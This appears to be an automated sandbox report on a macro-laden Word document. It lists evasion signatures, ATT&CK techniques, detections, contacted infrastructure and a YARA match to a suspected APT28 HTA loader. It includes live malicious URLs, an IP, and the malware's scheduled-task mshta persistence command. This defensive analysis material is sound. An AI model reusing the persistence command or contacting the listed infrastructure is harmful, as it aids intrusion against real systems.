Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Document contains an embedded VBA macro which accesses itself as a binary file (likely for evasion)
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function kokokokoko, API Open("C:\Users\user\AppData\Local\Temp\RoYAd85faz.doc.doc")Name: kokokokoko
Source: RoYAd85faz.docStream path 'VBA/ThisDocument' : found possibly 'ActiveDocument.Name' functions activedocument.name
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function documeNt_opEn, found possibly 'ActiveDocument.Name' functions activedocument.nameName: documeNt_opEn
Source: ~WRD0000.tmp.0.drStream path 'VBA/ThisDocument' : found possibly 'ActiveDocument.Name' functions activedocument.name
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW:
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWf
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83D80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information42
Scripting		Valid Accounts2
Exploitation for Client Execution		1
Browser Extensions		1
Process Injection		1
Masquerading		OS Credential Dumping11
Security Software Discovery		Remote Services1
Email Collection		1
Non-Application Layer Protocol		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job42
Scripting		1
DLL Side-Loading		1
Process Injection		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading		Logon Script (Windows)1
DLL Side-Loading		Security Account Manager1
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS4
System Information Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
RoYAd85faz.doc44%VirustotalBrowse
RoYAd85faz.doc34%ReversingLabsScript-Macro.Trojan.MacrosBomber
RoYAd85faz.doc100%AviraW2000M/AVI.Obfuscated.ldxun
RoYAd85faz.doc100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\Desktop\~WRD0000.tmp100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\~WRD0001.tmp100%Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://lookup.ink/match.phps0%Avira URL Cloudsafe
http://lookup.ink0%Avira URL Cloudsafe
http://lookup.ink/match.php=80%Avira URL Cloudsafe
http://lookup.ink/0%Avira URL Cloudsafe
http://lookup.ink/lookup.phpV0%Avira URL Cloudsafe
http://lookup.ink/match.phpOnly0%Avira URL Cloudsafe
http://lookup.ink/match.phpL0%Avira URL Cloudsafe
http://lookup.ink/lookup.phpy0%Avira URL Cloudsafe
http://lookup.inktT0%Avira URL Cloudsafe
http://lookup.ink/match.php-11CE-8C82-00AA004BA90B0%Avira URL Cloudsafe
http://lookup.ink/match.phpj0%Avira URL Cloudsafe
http://lookup.ink/lookup.php0%Avira URL Cloudsafe
http://lookup.ink/lookup.php-B0%Avira URL Cloudsafe
http://lookup.in0%Avira URL Cloudsafe
http://lookup.ink/lookup.phpC0%Avira URL Cloudsafe
http://lookup.ink/match.php$/0%Avira URL Cloudsafe
http://lookup.ink/match.phpMp0%Avira URL Cloudsafe
http://lookup.ink/match.phpA0%Avira URL Cloudsafe
http://lookup.ink/match.phpy0%Avira URL Cloudsafe
http://lookup.ink/match.php0%Avira URL Cloudsafe
http://lookup.ink/lookup.phpH0%Avira URL Cloudsafe
http://lookup.ink/lookup.php-0%Avira URL Cloudsafe
http://lookup.ink/lookup.phpN0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalse
    		high
    lookup.ink
    		104.21.84.174
    		truetrue
      		unknown
      browser.events.data.msn.cn
      		unknown
      		unknownfalse
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://lookup.inkmshta.exe, 00000009.00000002.2898991106.0000027C81A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2906582266.0000027CDC983000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://lookup.ink/match.php=8mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://lookup.ink/match.phpOnlymshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://lookup.ink/match.phpsmshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://lookup.ink/lookup.phpVmshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://lookup.ink/match.phpLmshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://lookup.ink/mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://lookup.inktTmshta.exe, 00000009.00000002.2899934649.0000027C831B4000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://lookup.ink/lookup.phpymshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://lookup.ink/match.php-11CE-8C82-00AA004BA90Bmshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://lookup.ink/match.phpjmshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://lookup.ink/lookup.phpmshta.exe, 00000009.00000002.2899934649.0000027C831B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2906582266.0000027CDC918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.2317903271.0000027C81A38000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://lookup.inmshta.exe, 00000009.00000003.2581750842.0000027C81A2E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://lookup.ink/lookup.php-Bmshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://lookup.ink/match.phpAmshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://lookup.ink/match.php$/mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://lookup.ink/match.phpmshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2901755666.0000027C83475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2898991106.0000027C81A2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2906582266.0000027CDC969000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2898991106.0000027C81A27000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.2581783335.0000027C81A2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://lookup.ink/lookup.phpCmshta.exe, 00000009.00000002.2899934649.0000027C831B4000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://lookup.ink/lookup.phpcmshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmpfalse
          		unknown
          http://lookup.ink/match.phpymshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://lookup.ink/match.phpMpmshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://lookup.ink/lookup.phpHmshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://lookup.ink/lookup.phpNmshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://lookup.ink/lookup.php-mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          104.21.84.174
          		lookup.inkUnited States
          		13335CLOUDFLARENETUStrue

          General Information

          Joe Sandbox version:42.0.0 Malachite
          Analysis ID:1590274
          Start date and time:2025-01-13 21:33:57 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 5m 41s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:defaultwindowsofficecookbook.jbs
          Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
          Run name:Potential for more IOCs and behavior
          Number of analysed new started processes analysed:19
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • GSI enabled (VBA)
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:RoYAd85faz.doc
          renamed because original name is a hash value
          Original Sample Name:ab5685ebf439f61c554977df1e1cd0c3.doc
          Detection:MAL
          Classification:mal100.expl.evad.winDOC@5/12@2/1
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .doc
          • Found Word or Excel or PowerPoint or XPS Viewer
          • Attach to Office via COM
          • Scroll down
          • Close Viewer

          Warnings

          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SecurityHealthHost.exe, dllhost.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.109.76.144, 52.113.194.132, 20.189.173.3, 95.100.110.74, 95.100.110.77, 2.20.245.216, 2.20.245.225, 2.23.240.50, 52.109.68.129, 52.109.32.39, 52.109.32.38, 52.109.32.46, 52.109.32.47, 52.111.236.35, 52.111.236.34, 52.111.236.32, 52.111.236.33, 52.182.143.215, 40.126.32.72, 20.109.210.53, 40.126.24.83
          • Excluded domains from analysis (whitelisted): e1324.dscd.akamaiedge.net, odc.officeapps.live.com, slscr.update.microsoft.com, mobile.events.data.microsoft.com, login.live.com, frc-azsc-000.roaming.officeapps.live.com, officeclient.microsoft.com, templatesmetadata.office.net, wu-b-net.trafficmanager.net, osiprod-neu-bronze-azsc-000.northeurope.cloudapp.azure.com, ecs.office.com, e40491.dscg.akamaiedge.net, uci.cdn.office.net, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, nleditor.osi.office.net, res-prod.trafficmanager.net, owamail.public.cdn.office.net.edgekey.net, s-0005.s-msedge.net, owamail.public.cdn.office.net.edgekey.net.globalredir.akadns.net, metadata.templates.cdn.office.net, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net, mobile.events.data.trafficmanager.net, neu-azsc-000.odc.officeapps.live.com, europe.odcsm1.live.com.akadns.net, templatesmetadata.office.net.edgekey.net, eur.roaming1.live.com.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtCreateFile calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryAttributesFile calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtReadVirtualMemory calls found.
          • Report size getting too big, too many NtSetValueKey calls found.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          15:37:33API Interceptor787x Sleep call for process: mshta.exe modified
          21:37:31Task SchedulerRun new task: Dispatch path: C:\Windows\System32\mshta.exe s>C:\Users\user\AppData\Local\Lookup\Dispatch

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          104.21.84.174https://54y.beribla.com/40OSwsn/Get hashmaliciousHTMLPhisherBrowse
            https://onlineguesfix.com/MbC5pb2JAcHJvbW9zdGFyLml0Get hashmaliciousHtmlDropper, HTMLPhisherBrowse

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              bg.microsoft.map.fastly.net40#U0433.docGet hashmaliciousUnknownBrowse
              • 199.232.210.172
              3.19.1+SetupWIService.exeGet hashmaliciousUnknownBrowse
              • 199.232.210.172
              JUbmpeT.exeGet hashmaliciousVidarBrowse
              • 199.232.210.172
              Invoice and packing list.exeGet hashmaliciousFormBook, PureLog StealerBrowse
              • 199.232.210.172
              AstralprivateDLL.exe.bin.exeGet hashmaliciousDCRat, PureLog Stealer, Xmrig, zgRATBrowse
              • 199.232.210.172
              documents.exeGet hashmaliciousRemcosBrowse
              • 199.232.210.172
              YYYY-NNN AUDIT DETAIL REPORT .docxGet hashmaliciousUnknownBrowse
              • 199.232.210.172
              1972921391166218927.jsGet hashmaliciousStrela DownloaderBrowse
              • 199.232.214.172
              29522576223272839.jsGet hashmaliciousStrela DownloaderBrowse
              • 199.232.214.172

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              CLOUDFLARENETUShttps://www.google.com/amp/url.rw/6r6nsGet hashmaliciousUnknownBrowse
              • 104.17.25.14
              EFT_Payment_Notification_Warriorsheart.htmlGet hashmaliciousHTMLPhisherBrowse
              • 104.17.25.14
              3e31414a-0c65-4866-9783-41979ca0d50e.emlGet hashmaliciousUnknownBrowse
              • 104.18.68.40
              https://timecusa-my.sharepoint.com/:f:/p/stephensw/Erq5TMDIJBVBvh6vbWmpurEB4UwHKTW8nzSkPE2Ckmvugg?e=SepTcTGet hashmaliciousHTMLPhisherBrowse
              • 104.18.95.41
              https://my.hy.ly/mktg/t/GQsngPhaoucFiqrpU/lRY60wG3ZRMjl/DrGolE1Q0aGno?eid=1816099335002400526&cid=1819527474349278460Get hashmaliciousUnknownBrowse
              • 162.247.243.29
              https://docusign.legalcloudfiles.com/S06ga?e=clopez@autopistacentral.clGet hashmaliciousHTMLPhisherBrowse
              • 104.17.25.14
              https://maya-lopez.filemail.com/t/XhcWEjoRGet hashmaliciousUnknownBrowse
              • 104.21.112.1
              Handler.exeGet hashmaliciousDanaBot, VidarBrowse
              • 172.64.41.3
              http://grastoonm3vides.comGet hashmaliciousUnknownBrowse
              • 104.21.112.1
              https://h3.errantrefrainundocked.shop/riii1.midGet hashmaliciousUnknownBrowse
              • 104.26.10.53

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Lookup\Dispatch

              Download File
              Process:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
              File Type:data
              Category:dropped
              Size (bytes):3442
              Entropy (8bit):5.634913051750585
              Encrypted:false
              SSDEEP:48:mm4eQ47qIOn6gm1tkXep8YFSAUY29IFR0X3J9wAfWoOw6jRz1EMdX7+Juu6mx:meQmdgmXl8wS9IXu3zwAzG1X6JuK
              MD5:8E4E95301EA6335A16A30ACEEE50A254
              SHA1:C677881DEFDC1F405DF8418E0FD9C83B119A0A7D
              SHA-256:BA687C26C45588673834075F894AB4A10D92C336C934F9695A3916334270BA91
              SHA-512:64D04C856E8921B92F980CAF650CCD187CC61B51A09EDA000F52597E054C28FC39A40C28EB0B36FE458137F33B32C6A91A5C3289D857C4CD699A04D2BAEB68C5
              Malicious:false
              Yara Hits:
              • Rule: apt_susp_apt28_uac0063_hta_loader, Description: Detects some suspected APT28 HTA loader, Source: C:\Users\user\AppData\Local\Lookup\Dispatch, Author: Sekoia.io
              Reputation:low
